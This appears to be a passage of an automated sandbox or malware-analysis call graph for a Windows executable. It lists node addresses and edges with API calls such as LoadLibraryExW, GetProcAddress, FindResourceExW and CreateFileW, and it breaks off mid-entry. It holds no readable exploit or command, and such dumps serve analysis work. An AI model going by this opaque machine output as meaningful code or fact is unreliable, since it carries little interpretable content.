_W_store_winword 61 API calls 104666->104667 104668 80389c 104667->104668 104668->104645 104670 8038a6 104668->104670 104671 83d24f 104669->104671 104672 822efd _W_store_winword 61 API calls 104670->104672 104673 803ed0 60 API calls 104671->104673 104674 8038b1 104672->104674 104675 83d25c 104673->104675 104674->104649 104676 8038bb 104674->104676 104675->104675 104677 822efd _W_store_winword 61 API calls 104676->104677 104678 8038c6 104677->104678 104678->104663 104679 803907 104678->104679 104681 803ed0 60 API calls 104678->104681 104679->104663 104680 803914 104679->104680 104888 8092ce 104680->104888 104683 8038ea 104681->104683 104685 808047 60 API calls 104683->104685 104687 8038f8 104685->104687 104689 803ed0 60 API calls 104687->104689 104689->104679 104691 80928a 60 API calls 104693 80394f 104691->104693 104692 808ee0 61 API calls 104692->104693 104693->104691 104693->104692 104694 803ed0 60 API calls 104693->104694 104695 803995 Mailbox 104693->104695 104694->104693 104695->104560 104697 807292 __ftell_nolock 104696->104697 104698 83ea22 _memset 104697->104698 104699 8072ab 104697->104699 104701 83ea3e 75B0A2D5 104698->104701 105796 804750 104699->105796 104703 83ea8d 104701->104703 104705 807bcc 60 API calls 104703->104705 104707 83eaa2 104705->104707 104707->104707 104709 8072c9 105824 80686a 104709->105824 104713 81093a __ftell_nolock 104712->104713 106136 806d80 104713->106136 104715 81093f 104716 803c14 104715->104716 106147 81119e 90 API calls 104715->106147 104716->104569 104716->104577 104718 81094c 104718->104716 106148 813ee7 92 API calls Mailbox 104718->106148 104720 810955 104720->104716 104721 810959 GetFullPathNameW 104720->104721 104722 807bcc 60 API calls 104721->104722 104723 810985 104722->104723 104729 803ab0 LoadImageW RegisterClassExW 104728->104729 104730 83d261 104728->104730 106185 803041 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 104729->106185 106189 8047a0 LoadImageW EnumResourceNamesW 104730->106189 104814->104569 104815->104581 104817 831940 __ftell_nolock 104816->104817 104828 803d3e __ftell_nolock 104827->104828 104829 807bcc 60 API calls 104828->104829 104833 803ea4 Mailbox 104828->104833 104830 803d70 104829->104830 104839 803da6 Mailbox 104830->104839 104949 8079f2 104830->104949 104832 803e77 104832->104833 104834 807de1 60 API calls 104832->104834 104833->104619 104836 803e98 104834->104836 104835 807de1 60 API calls 104835->104839 104838 803f74 60 API calls 104836->104838 104837 8079f2 60 API calls 104837->104839 104838->104833 104839->104832 104839->104833 104839->104835 104839->104837 104952 803f74 104839->104952 104958 804bb5 104841->104958 104846 83d8e6 104848 804e4a 85 API calls 104846->104848 104847 804e08 LoadLibraryExW 104968 804b6a 104847->104968 104850 83d8ed 104848->104850 104852 804b6a 3 API calls 104850->104852 104854 83d8f5 104852->104854 104994 804f0b 104854->104994 104855 804e2f 104855->104854 104856 804e3b 104855->104856 104858 804e4a 85 API calls 104856->104858 104859 8037d4 104858->104859 104859->104626 104859->104627 104862 83d91c 105002 804ec7 104862->105002 104864 83d929 104866 820db6 Mailbox 60 API calls 104865->104866 104867 8037fb 104866->104867 104867->104640 104869 8084cb 104868->104869 104871 8084f2 104869->104871 105430 8089b3 104869->105430 104871->104644 104873 803ef3 104872->104873 104874 803eda 104872->104874 104875 807bcc 60 API calls 104873->104875 104876 808047 60 API calls 104874->104876 104877 803879 104875->104877 104876->104877 104878 822efd 104877->104878 104879 822f09 104878->104879 104880 822f7e 104878->104880 104887 822f2e 104879->104887 105456 828b28 59 API calls __getptd_noexit 104879->105456 105458 822f90 61 API calls 4 library calls 104880->105458 104882 822f8b 104882->104665 104884 822f15 105457 828db6 9 API calls _fprintf 104884->105457 104886 822f20 104886->104665 104887->104665 104889 8092d6 104888->104889 104890 820db6 Mailbox 60 API calls 104889->104890 104891 8092e4 104890->104891 104892 803924 104891->104892 105459 8091fc 60 API calls Mailbox 104891->105459 104894 809050 104892->104894 105460 809160 104894->105460 104896 80905f 104897 820db6 Mailbox 60 API calls 104896->104897 104898 803932 104896->104898 104897->104898 104899 808ee0 104898->104899 104900 83f17c 104899->104900 104902 808ef7 104899->104902 104900->104902 105470 808bdb 60 API calls Mailbox 104900->105470 104903 808fff 104902->104903 104904 809040 104902->104904 104905 808ff8 104902->104905 104903->104693 105469 809d3c 61 API calls Mailbox 104904->105469 104906 820db6 Mailbox 60 API calls 104905->104906 104906->104903 104909 804ee5 86 API calls 104908->104909 104910 8695ca 104909->104910 105471 869734 104910->105471 104913 804f0b 75 API calls 104914 8695f7 104913->104914 104915 804f0b 75 API calls 104914->104915 104916 869607 104915->104916 104917 804f0b 75 API calls 104916->104917 104918 869622 104917->104918 104919 804f0b 75 API calls 104918->104919 104920 86963d 104919->104920 104921 804ee5 86 API calls 104920->104921 104922 869654 104921->104922 104923 82571c __crtGetStringTypeA_stat 59 API calls 104922->104923 104924 86965b 104923->104924 104925 82571c __crtGetStringTypeA_stat 59 API calls 104924->104925 104926 869665 104925->104926 104927 804f0b 75 API calls 104926->104927 104928 869679 104927->104928 104929 869109 GetSystemTimeAsFileTime 104928->104929 104930 86968c 104929->104930 104931 8696b6 104930->104931 104932 8696a1 104930->104932 104933 8696bc 104931->104933 104934 86971b 104931->104934 104935 822d55 _free 59 API calls 104932->104935 105477 868b06 104933->105477 104937 822d55 _free 59 API calls 104934->104937 104938 8696a7 104935->104938 104941 83d186 104937->104941 104939 822d55 _free 59 API calls 104938->104939 104939->104941 104941->104634 104943 804e4a 104941->104943 104942 822d55 _free 59 API calls 104942->104941 104944 804e54 104943->104944 104946 804e5b 104943->104946 104945 8253a6 __fcloseall 84 API calls 104944->104945 104945->104946 104947 804e6a 104946->104947 104948 804e7b FreeLibrary 104946->104948 104947->104634 104948->104947 104950 807e4f 60 API calls 104949->104950 104951 8079fd 104950->104951 104951->104830 104953 803f82 104952->104953 104957 803fa4 _memmove 104952->104957 104955 820db6 Mailbox 60 API calls 104953->104955 104954 820db6 Mailbox 60 API calls 104956 803fb8 104954->104956 104955->104957 104956->104839 104957->104954 105007 804c03 104958->105007 104961 804bdc 104963 804bf5 104961->104963 104964 804bec FreeLibrary 104961->104964 104962 804c03 2 API calls 104962->104961 104965 82525b 104963->104965 104964->104963 105011 825270 104965->105011 104967 804dfc 104967->104846 104967->104847 105167 804c36 104968->105167 104971 804ba1 FreeLibrary 104972 804baa 104971->104972 104975 804c70 104972->104975 104973 804c36 2 API calls 104974 804b8f 104973->104974 104974->104971 104974->104972 104976 820db6 Mailbox 60 API calls 104975->104976 104977 804c85 104976->104977 105171 80522e 104977->105171 104979 804c91 _memmove 104980 804ccc 104979->104980 104981 804dc1 104979->104981 104982 804d89 104979->104982 104983 804ec7 70 API calls 104980->104983 105185 86991b 96 API calls 104981->105185 105174 804e89 CreateStreamOnHGlobal 104982->105174 104991 804cd5 104983->104991 104986 804f0b 75 API calls 104986->104991 104988 804d69 104988->104855 104989 83d8a7 104990 804ee5 86 API calls 104989->104990 104992 83d8bb 104990->104992 104991->104986 104991->104988 104991->104989 105180 804ee5 104991->105180 104993 804f0b 75 API calls 104992->104993 104993->104988 104995 804f1d 104994->104995 104996 83d9cd 104994->104996 105209 8255e2 104995->105209 104999 869109 105407 868f5f 104999->105407 105001 86911f 105001->104862 105003 83d990 105002->105003 105004 804ed6 105002->105004 105412 825c60 105004->105412 105006 804ede 105006->104864 105008 804bd0 105007->105008 105009 804c0c LoadLibraryA 105007->105009 105008->104961 105008->104962 105009->105008 105010 804c1d GetProcAddress 105009->105010 105010->105008 105013 82527c _fprintf 105011->105013 105012 82528f 105060 828b28 59 API calls __getptd_noexit 105012->105060 105013->105012 105015 8252c0 105013->105015 105030 8304e8 105015->105030 105016 825294 105061 828db6 9 API calls _fprintf 105016->105061 105019 8252c5 105020 8252db 105019->105020 105021 8252ce 105019->105021 105023 825305 105020->105023 105024 8252e5 105020->105024 105062 828b28 59 API calls __getptd_noexit 105021->105062 105045 830607 105023->105045 105063 828b28 59 API calls __getptd_noexit 105024->105063 105028 82529f @_EH4_CallFilterFunc@8 _fprintf 105028->104967 105031 8304f4 _fprintf 105030->105031 105032 829c0b __lock 59 API calls 105031->105032 105042 830502 105032->105042 105033 830576 105065 8305fe 105033->105065 105034 83057d 105070 82881d 59 API calls 2 library calls 105034->105070 105037 8305f3 _fprintf 105037->105019 105038 830584 105038->105033 105040 829e2b __ioinit 2 API calls 105038->105040 105043 8305aa RtlEnterCriticalSection 105040->105043 105041 829c93 __mtinitlocknum 59 API calls 105041->105042 105042->105033 105042->105034 105042->105041 105068 826c50 60 API calls __lock 105042->105068 105069 826cba RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 105042->105069 105043->105033 105054 830627 __wopenfile 105045->105054 105046 830641 105075 828b28 59 API calls __getptd_noexit 105046->105075 105048 8307fc 105048->105046 105052 83085f 105048->105052 105049 830646 105076 828db6 9 API calls _fprintf 105049->105076 105051 825310 105064 825332 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 105051->105064 105072 8385a1 105052->105072 105054->105046 105054->105048 105077 8237cb 61 API calls 3 library calls 105054->105077 105056 8307f5 105056->105048 105078 8237cb 61 API calls 3 library calls 105056->105078 105058 830814 105058->105048 105079 8237cb 61 API calls 3 library calls 105058->105079 105060->105016 105061->105028 105062->105028 105063->105028 105064->105028 105071 829d75 RtlLeaveCriticalSection 105065->105071 105067 830605 105067->105037 105068->105042 105069->105042 105070->105038 105071->105067 105080 837d85 105072->105080 105074 8385ba 105074->105051 105075->105049 105076->105051 105077->105056 105078->105058 105079->105048 105081 837d91 _fprintf 105080->105081 105082 837da7 105081->105082 105085 837ddd 105081->105085 105164 828b28 59 API calls __getptd_noexit 105082->105164 105084 837dac 105165 828db6 9 API calls _fprintf 105084->105165 105091 837e4e 105085->105091 105088 837df9 105166 837e22 RtlLeaveCriticalSection __unlock_fhandle 105088->105166 105090 837db6 _fprintf 105090->105074 105092 837e6e 105091->105092 105093 8244ea __wsopen_nolock 59 API calls 105092->105093 105096 837e8a 105093->105096 105094 828dc6 __invoke_watson 8 API calls 105095 8385a0 105094->105095 105098 837d85 __wsopen_helper 104 API calls 105095->105098 105097 837ec4 105096->105097 105109 837ee7 105096->105109 105163 837fc1 105096->105163 105099 828af4 __set_osfhnd 59 API calls 105097->105099 105100 8385ba 105098->105100 105101 837ec9 105099->105101 105100->105088 105102 828b28 __set_osfhnd 59 API calls 105101->105102 105103 837ed6 105102->105103 105105 828db6 _fprintf 9 API calls 105103->105105 105104 837fa5 105106 828af4 __set_osfhnd 59 API calls 105104->105106 105107 837ee0 105105->105107 105108 837faa 105106->105108 105107->105088 105110 828b28 __set_osfhnd 59 API calls 105108->105110 105109->105104 105112 837f83 105109->105112 105111 837fb7 105110->105111 105113 828db6 _fprintf 9 API calls 105111->105113 105114 82d294 __alloc_osfhnd 62 API calls 105112->105114 105113->105163 105115 838051 105114->105115 105116 83805b 105115->105116 105117 83807e 105115->105117 105119 828af4 __set_osfhnd 59 API calls 105116->105119 105118 837cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105117->105118 105128 8380a0 105118->105128 105120 838060 105119->105120 105122 828b28 __set_osfhnd 59 API calls 105120->105122 105121 83811e GetFileType 105125 83816b 105121->105125 105126 838129 GetLastError 105121->105126 105124 83806a 105122->105124 105123 8380ec GetLastError 105129 828b07 __dosmaperr 59 API calls 105123->105129 105130 828b28 __set_osfhnd 59 API calls 105124->105130 105136 82d52a __set_osfhnd 60 API calls 105125->105136 105127 828b07 __dosmaperr 59 API calls 105126->105127 105131 838150 CloseHandle 105127->105131 105128->105121 105128->105123 105132 837cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105128->105132 105133 838111 105129->105133 105130->105107 105131->105133 105134 83815e 105131->105134 105135 8380e1 105132->105135 105138 828b28 __set_osfhnd 59 API calls 105133->105138 105137 828b28 __set_osfhnd 59 API calls 105134->105137 105135->105121 105135->105123 105140 838189 105136->105140 105139 838163 105137->105139 105138->105163 105139->105133 105141 838344 105140->105141 105142 8318c1 __lseeki64_nolock 61 API calls 105140->105142 105152 83820a 105140->105152 105144 838517 CloseHandle 105141->105144 105141->105163 105143 8381f3 105142->105143 105147 828af4 __set_osfhnd 59 API calls 105143->105147 105143->105152 105145 837cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105144->105145 105146 83853e 105145->105146 105149 838546 GetLastError 105146->105149 105150 838572 105146->105150 105147->105152 105148 830e5b 71 API calls __read_nolock 105148->105152 105151 828b07 __dosmaperr 59 API calls 105149->105151 105150->105163 105153 838552 105151->105153 105152->105141 105152->105148 105154 830add __close_nolock 62 API calls 105152->105154 105156 8397a2 __chsize_nolock 83 API calls 105152->105156 105157 82d886 __write 79 API calls 105152->105157 105158 8383c1 105152->105158 105159 8318c1 61 API calls __lseeki64_nolock 105152->105159 105155 82d43d __free_osfhnd 60 API calls 105153->105155 105154->105152 105155->105150 105156->105152 105157->105152 105160 830add __close_nolock 62 API calls 105158->105160 105159->105152 105161 8383c8 105160->105161 105162 828b28 __set_osfhnd 59 API calls 105161->105162 105162->105163 105163->105094 105164->105084 105165->105090 105166->105090 105168 804b83 105167->105168 105169 804c3f LoadLibraryA 105167->105169 105168->104973 105168->104974 105169->105168 105170 804c50 GetProcAddress 105169->105170 105170->105168 105172 820db6 Mailbox 60 API calls 105171->105172 105173 805240 105172->105173 105173->104979 105175 804ea3 FindResourceExW 105174->105175 105179 804ec0 105174->105179 105176 83d933 LoadResource 105175->105176 105175->105179 105177 83d948 SizeofResource 105176->105177 105176->105179 105178 83d95c LockResource 105177->105178 105177->105179 105178->105179 105179->104980 105181 804ef4 105180->105181 105182 83d9ab 105180->105182 105186 82584d 105181->105186 105184 804f02 105184->104991 105185->104980 105190 825859 _fprintf 105186->105190 105187 82586b 105199 828b28 59 API calls __getptd_noexit 105187->105199 105189 825891 105201 826c11 105189->105201 105190->105187 105190->105189 105191 825870 105200 828db6 9 API calls _fprintf 105191->105200 105194 825897 105207 8257be 84 API calls 5 library calls 105194->105207 105196 82587b _fprintf 105196->105184 105197 8258a6 105208 8258c8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 105197->105208 105199->105191 105200->105196 105202 826c43 RtlEnterCriticalSection 105201->105202 105203 826c21 105201->105203 105205 826c39 105202->105205 105203->105202 105204 826c29 105203->105204 105206 829c0b __lock 59 API calls 105204->105206 105205->105194 105206->105205 105207->105197 105208->105196 105212 8255fd 105209->105212 105211 804f2e 105211->104999 105213 825609 _fprintf 105212->105213 105214 82561f _memset 105213->105214 105215 82564c 105213->105215 105216 825644 _fprintf 105213->105216 105239 828b28 59 API calls __getptd_noexit 105214->105239 105217 826c11 __lock_file 60 API calls 105215->105217 105216->105211 105218 825652 105217->105218 105225 82541d 105218->105225 105221 825639 105240 828db6 9 API calls _fprintf 105221->105240 105229 825438 _memset 105225->105229 105238 825453 105225->105238 105226 825443 105337 828b28 59 API calls __getptd_noexit 105226->105337 105228 825448 105338 828db6 9 API calls _fprintf 105228->105338 105229->105226 105235 825493 105229->105235 105229->105238 105232 8255a4 _memset 105340 828b28 59 API calls __getptd_noexit 105232->105340 105235->105232 105235->105238 105242 8246e6 105235->105242 105249 830e5b 105235->105249 105317 830ba7 105235->105317 105339 830cc8 59 API calls 4 library calls 105235->105339 105241 825686 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 105238->105241 105239->105221 105240->105216 105241->105216 105243 8246f0 105242->105243 105244 824705 105242->105244 105341 828b28 59 API calls __getptd_noexit 105243->105341 105244->105235 105246 8246f5 105342 828db6 9 API calls _fprintf 105246->105342 105248 824700 105248->105235 105250 830e93 105249->105250 105251 830e7c 105249->105251 105252 8315cb 105250->105252 105257 830ecd 105250->105257 105352 828af4 59 API calls __getptd_noexit 105251->105352 105368 828af4 59 API calls __getptd_noexit 105252->105368 105254 830e81 105353 828b28 59 API calls __getptd_noexit 105254->105353 105259 830ed5 105257->105259 105265 830eec 105257->105265 105258 8315d0 105369 828b28 59 API calls __getptd_noexit 105258->105369 105354 828af4 59 API calls __getptd_noexit 105259->105354 105262 830ee1 105370 828db6 9 API calls _fprintf 105262->105370 105263 830eda 105355 828b28 59 API calls __getptd_noexit 105263->105355 105264 830f01 105356 828af4 59 API calls __getptd_noexit 105264->105356 105265->105264 105268 830f1b 105265->105268 105270 830f39 105265->105270 105297 830e88 105265->105297 105268->105264 105273 830f26 105268->105273 105357 82881d 59 API calls 2 library calls 105270->105357 105343 835c6b 105273->105343 105274 830f49 105276 830f51 105274->105276 105277 830f6c 105274->105277 105275 83103a 105278 8310b3 ReadFile 105275->105278 105284 831050 GetConsoleMode 105275->105284 105358 828b28 59 API calls __getptd_noexit 105276->105358 105360 8318c1 61 API calls 3 library calls 105277->105360 105281 831593 GetLastError 105278->105281 105282 8310d5 105278->105282 105285 8315a0 105281->105285 105286 831093 105281->105286 105282->105281 105291 8310a5 105282->105291 105283 830f56 105359 828af4 59 API calls __getptd_noexit 105283->105359 105288 8310b0 105284->105288 105289 831064 105284->105289 105366 828b28 59 API calls __getptd_noexit 105285->105366 105299 831099 105286->105299 105361 828b07 59 API calls 2 library calls 105286->105361 105288->105278 105289->105288 105292 83106a ReadConsoleW 105289->105292 105291->105299 105300 831377 105291->105300 105301 83110a 105291->105301 105292->105291 105294 83108d GetLastError 105292->105294 105293 8315a5 105367 828af4 59 API calls __getptd_noexit 105293->105367 105294->105286 105297->105235 105298 822d55 _free 59 API calls 105298->105297 105299->105297 105299->105298 105300->105299 105307 83147d ReadFile 105300->105307 105303 831176 ReadFile 105301->105303 105311 8311f7 105301->105311 105304 831197 GetLastError 105303->105304 105308 8311a1 105303->105308 105304->105308 105305 8312b4 105314 831264 MultiByteToWideChar 105305->105314 105364 8318c1 61 API calls 3 library calls 105305->105364 105306 8312a4 105363 828b28 59 API calls __getptd_noexit 105306->105363 105310 8314a0 GetLastError 105307->105310 105315 8314ae 105307->105315 105308->105301 105362 8318c1 61 API calls 3 library calls 105308->105362 105310->105315 105311->105299 105311->105305 105311->105306 105311->105314 105314->105294 105314->105299 105315->105300 105365 8318c1 61 API calls 3 library calls 105315->105365 105318 830bb2 105317->105318 105322 830bc7 105317->105322 105404 828b28 59 API calls __getptd_noexit 105318->105404 105320 830bb7 105405 828db6 9 API calls _fprintf 105320->105405 105324 830bfc 105322->105324 105331 830bc2 105322->105331 105406 835fe4 59 API calls __malloc_crt 105322->105406 105325 8246e6 _fprintf 59 API calls 105324->105325 105326 830c10 105325->105326 105371 830d47 105326->105371 105328 830c17 105329 8246e6 _fprintf 59 API calls 105328->105329 105328->105331 105330 830c3a 105329->105330 105330->105331 105332 8246e6 _fprintf 59 API calls 105330->105332 105331->105235 105333 830c46 105332->105333 105333->105331 105334 8246e6 _fprintf 59 API calls 105333->105334 105335 830c53 105334->105335 105336 8246e6 _fprintf 59 API calls 105335->105336 105336->105331 105337->105228 105338->105238 105339->105235 105340->105228 105341->105246 105342->105248 105344 835c76 105343->105344 105346 835c83 105343->105346 105345 828b28 __set_osfhnd 59 API calls 105344->105345 105347 835c7b 105345->105347 105348 835c8f 105346->105348 105349 828b28 __set_osfhnd 59 API calls 105346->105349 105347->105275 105348->105275 105350 835cb0 105349->105350 105351 828db6 _fprintf 9 API calls 105350->105351 105351->105347 105352->105254 105353->105297 105354->105263 105355->105262 105356->105263 105357->105274 105358->105283 105359->105297 105360->105273 105361->105299 105362->105308 105363->105299 105364->105314 105365->105315 105366->105293 105367->105299 105368->105258 105369->105262 105370->105297 105372 830d53 _fprintf 105371->105372 105373 830d60 105372->105373 105374 830d77 105372->105374 105376 828af4 __set_osfhnd 59 API calls 105373->105376 105375 830e3b 105374->105375 105377 830d8b 105374->105377 105378 828af4 __set_osfhnd 59 API calls 105375->105378 105379 830d65 105376->105379 105380 830db6 105377->105380 105381 830da9 105377->105381 105382 830dae 105378->105382 105383 828b28 __set_osfhnd 59 API calls 105379->105383 105385 830dc3 105380->105385 105386 830dd8 105380->105386 105384 828af4 __set_osfhnd 59 API calls 105381->105384 105389 828b28 __set_osfhnd 59 API calls 105382->105389 105391 830d6c _fprintf 105383->105391 105384->105382 105387 828af4 __set_osfhnd 59 API calls 105385->105387 105388 82d206 ___lock_fhandle 60 API calls 105386->105388 105392 830dc8 105387->105392 105393 830dde 105388->105393 105390 830dd0 105389->105390 105398 828db6 _fprintf 9 API calls 105390->105398 105391->105328 105396 828b28 __set_osfhnd 59 API calls 105392->105396 105394 830df1 105393->105394 105395 830e04 105393->105395 105397 830e5b __read_nolock 71 API calls 105394->105397 105399 828b28 __set_osfhnd 59 API calls 105395->105399 105396->105390 105400 830dfd 105397->105400 105398->105391 105401 830e09 105399->105401 105403 830e33 __read RtlLeaveCriticalSection 105400->105403 105402 828af4 __set_osfhnd 59 API calls 105401->105402 105402->105400 105403->105391 105404->105320 105405->105331 105406->105324 105410 82520a GetSystemTimeAsFileTime 105407->105410 105409 868f6e 105409->105001 105411 825238 __aulldiv 105410->105411 105411->105409 105413 825c6c _fprintf 105412->105413 105414 825c93 105413->105414 105415 825c7e 105413->105415 105417 826c11 __lock_file 60 API calls 105414->105417 105426 828b28 59 API calls __getptd_noexit 105415->105426 105419 825c99 105417->105419 105418 825c83 105427 828db6 9 API calls _fprintf 105418->105427 105428 8258d0 68 API calls 6 library calls 105419->105428 105422 825ca4 105429 825cc4 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 105422->105429 105424 825cb6 105425 825c8e _fprintf 105424->105425 105425->105006 105426->105418 105427->105425 105428->105422 105429->105424 105446 808740 105430->105446 105432 8089c3 105433 808a3d 105432->105433 105434 8089cd 105432->105434 105455 809d3c 61 API calls Mailbox 105433->105455 105435 820db6 Mailbox 60 API calls 105434->105435 105437 8089de 105435->105437 105439 8089ec 105437->105439 105440 807667 60 API calls 105437->105440 105438 808a2d 105438->104871 105441 8089fb 105439->105441 105453 807f77 60 API calls 2 library calls 105439->105453 105440->105439 105442 820db6 Mailbox 60 API calls 105441->105442 105444 808a05 105442->105444 105454 808660 69 API calls 105444->105454 105447 808921 105446->105447 105448 808753 105446->105448 105447->105432 105449 807667 60 API calls 105448->105449 105452 808764 105448->105452 105450 808983 105449->105450 105451 822d40 __cinit 68 API calls 105450->105451 105451->105452 105452->105432 105453->105441 105454->105438 105455->105438 105456->104884 105457->104886 105458->104882 105459->104892 105461 809169 Mailbox 105460->105461 105462 83f19f 105461->105462 105467 809173 105461->105467 105463 820db6 Mailbox 60 API calls 105462->105463 105465 83f1ab 105463->105465 105464 80917a 105464->104896 105467->105464 105468 809c90 60 API calls Mailbox 105467->105468 105468->105467 105469->104903 105470->104902 105476 869748 __tzset_nolock _wcscmp 105471->105476 105472 8695dc 105472->104913 105472->104941 105473 869109 GetSystemTimeAsFileTime 105473->105476 105474 804f0b 75 API calls 105474->105476 105475 804ee5 86 API calls 105475->105476 105476->105472 105476->105473 105476->105474 105476->105475 105478 868b1f 105477->105478 105479 868b11 105477->105479 105481 868b64 105478->105481 105482 82525b 116 API calls 105478->105482 105493 868b28 105478->105493 105480 82525b 116 API calls 105479->105480 105480->105478 105508 868d91 105481->105508 105483 868b49 105482->105483 105483->105481 105486 868b52 105483->105486 105485 868ba8 105487 868bac 105485->105487 105488 868bcd 105485->105488 105490 8253a6 __fcloseall 84 API calls 105486->105490 105486->105493 105489 868bb9 105487->105489 105492 8253a6 __fcloseall 84 API calls 105487->105492 105512 8689a9 105488->105512 105489->105493 105495 8253a6 __fcloseall 84 API calls 105489->105495 105490->105493 105492->105489 105493->104942 105495->105493 105496 868bfb 105521 868c2b 105496->105521 105497 868bdb 105499 868be8 105497->105499 105501 8253a6 __fcloseall 84 API calls 105497->105501 105499->105493 105502 8253a6 __fcloseall 84 API calls 105499->105502 105501->105499 105502->105493 105505 868c16 105505->105493 105507 8253a6 __fcloseall 84 API calls 105505->105507 105507->105493 105509 868db6 105508->105509 105511 868d9f __tzset_nolock _memmove 105508->105511 105510 8255e2 __fread_nolock 75 API calls 105509->105510 105510->105511 105511->105485 105513 82571c __crtGetStringTypeA_stat 59 API calls 105512->105513 105514 8689b8 105513->105514 105515 82571c __crtGetStringTypeA_stat 59 API calls 105514->105515 105516 8689cc 105515->105516 105517 82571c __crtGetStringTypeA_stat 59 API calls 105516->105517 105518 8689e0 105517->105518 105519 868d0d 59 API calls 105518->105519 105520 8689f3 105518->105520 105519->105520 105520->105496 105520->105497 105525 868c40 105521->105525 105522 868cf8 105554 868f35 105522->105554 105524 868a05 75 API calls 105524->105525 105525->105522 105525->105524 105528 868c02 105525->105528 105550 868e12 105525->105550 105558 868aa1 75 API calls 105525->105558 105529 868d0d 105528->105529 105530 868d20 105529->105530 105531 868d1a 105529->105531 105533 822d55 _free 59 API calls 105530->105533 105534 868d31 105530->105534 105532 822d55 _free 59 API calls 105531->105532 105532->105530 105533->105534 105535 822d55 _free 59 API calls 105534->105535 105536 868c09 105534->105536 105535->105536 105536->105505 105537 8253a6 105536->105537 105538 8253b2 _fprintf 105537->105538 105539 8253c6 105538->105539 105540 8253de 105538->105540 105607 828b28 59 API calls __getptd_noexit 105539->105607 105543 826c11 __lock_file 60 API calls 105540->105543 105546 8253d6 _fprintf 105540->105546 105542 8253cb 105608 828db6 9 API calls _fprintf 105542->105608 105545 8253f0 105543->105545 105591 82533a 105545->105591 105546->105505 105551 868e21 105550->105551 105552 868e61 105550->105552 105551->105525 105552->105551 105559 868ee8 105552->105559 105555 868f42 105554->105555 105557 868f53 105554->105557 105556 824863 81 API calls 105555->105556 105556->105557 105557->105528 105558->105525 105560 868f14 105559->105560 105561 868f25 105559->105561 105563 824863 105560->105563 105561->105552 105564 82486f _fprintf 105563->105564 105565 82489d _fprintf 105564->105565 105566 8248a5 105564->105566 105567 82488d 105564->105567 105565->105561 105568 826c11 __lock_file 60 API calls 105566->105568 105588 828b28 59 API calls __getptd_noexit 105567->105588 105570 8248ab 105568->105570 105576 82470a 105570->105576 105571 824892 105589 828db6 9 API calls _fprintf 105571->105589 105578 824719 105576->105578 105583 824737 105576->105583 105577 824727 105579 828b28 __set_osfhnd 59 API calls 105577->105579 105578->105577 105578->105583 105587 824751 _memmove 105578->105587 105580 82472c 105579->105580 105581 828db6 _fprintf 9 API calls 105580->105581 105581->105583 105582 82ae1e __flsbuf 79 API calls 105582->105587 105590 8248dd RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 105583->105590 105584 824a3d __flush 79 API calls 105584->105587 105585 8246e6 _fprintf 59 API calls 105585->105587 105586 82d886 __write 79 API calls 105586->105587 105587->105582 105587->105583 105587->105584 105587->105585 105587->105586 105588->105571 105589->105565 105590->105565 105592 825349 105591->105592 105593 82535d 105591->105593 105646 828b28 59 API calls __getptd_noexit 105592->105646 105595 825359 105593->105595 105610 824a3d 105593->105610 105609 825415 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 105595->105609 105596 82534e 105647 828db6 9 API calls _fprintf 105596->105647 105602 8246e6 _fprintf 59 API calls 105603 825377 105602->105603 105620 830a02 105603->105620 105605 82537d 105605->105595 105606 822d55 _free 59 API calls 105605->105606 105606->105595 105607->105542 105608->105546 105609->105546 105611 824a50 105610->105611 105612 824a74 105610->105612 105611->105612 105613 8246e6 _fprintf 59 API calls 105611->105613 105616 830b77 105612->105616 105614 824a6d 105613->105614 105648 82d886 105614->105648 105617 825371 105616->105617 105618 830b84 105616->105618 105617->105602 105618->105617 105619 822d55 _free 59 API calls 105618->105619 105619->105617 105621 830a0e _fprintf 105620->105621 105622 830a32 105621->105622 105623 830a1b 105621->105623 105625 830abd 105622->105625 105627 830a42 105622->105627 105773 828af4 59 API calls __getptd_noexit 105623->105773 105778 828af4 59 API calls __getptd_noexit 105625->105778 105626 830a20 105774 828b28 59 API calls __getptd_noexit 105626->105774 105630 830a60 105627->105630 105631 830a6a 105627->105631 105775 828af4 59 API calls __getptd_noexit 105630->105775 105633 82d206 ___lock_fhandle 60 API calls 105631->105633 105632 830a65 105779 828b28 59 API calls __getptd_noexit 105632->105779 105637 830a70 105633->105637 105634 830a27 _fprintf 105634->105605 105639 830a83 105637->105639 105640 830a8e 105637->105640 105638 830ac9 105780 828db6 9 API calls _fprintf 105638->105780 105758 830add 105639->105758 105776 828b28 59 API calls __getptd_noexit 105640->105776 105644 830a89 105777 830ab5 RtlLeaveCriticalSection __unlock_fhandle 105644->105777 105646->105596 105647->105595 105649 82d892 _fprintf 105648->105649 105650 82d8b6 105649->105650 105651 82d89f 105649->105651 105653 82d955 105650->105653 105655 82d8ca 105650->105655 105749 828af4 59 API calls __getptd_noexit 105651->105749 105755 828af4 59 API calls __getptd_noexit 105653->105755 105654 82d8a4 105750 828b28 59 API calls __getptd_noexit 105654->105750 105658 82d8f2 105655->105658 105659 82d8e8 105655->105659 105676 82d206 105658->105676 105751 828af4 59 API calls __getptd_noexit 105659->105751 105663 82d8f8 105666 82d90b 105663->105666 105667 82d91e 105663->105667 105664 82d8ed 105756 828b28 59 API calls __getptd_noexit 105664->105756 105665 82d961 105757 828db6 9 API calls _fprintf 105665->105757 105685 82d975 105666->105685 105752 828b28 59 API calls __getptd_noexit 105667->105752 105671 82d917 105754 82d94d RtlLeaveCriticalSection __unlock_fhandle 105671->105754 105672 82d923 105753 828af4 59 API calls __getptd_noexit 105672->105753 105673 82d8ab _fprintf 105673->105612 105677 82d212 _fprintf 105676->105677 105678 82d261 RtlEnterCriticalSection 105677->105678 105680 829c0b __lock 59 API calls 105677->105680 105679 82d287 _fprintf 105678->105679 105679->105663 105681 82d237 105680->105681 105682 82d24f 105681->105682 105683 829e2b __ioinit InitializeCriticalSectionEx InitializeCriticalSectionAndSpinCount 105681->105683 105684 82d28b ___lock_fhandle RtlLeaveCriticalSection 105682->105684 105683->105682 105684->105678 105686 82d982 __ftell_nolock 105685->105686 105687 82d9e0 105686->105687 105688 82d9c1 105686->105688 105719 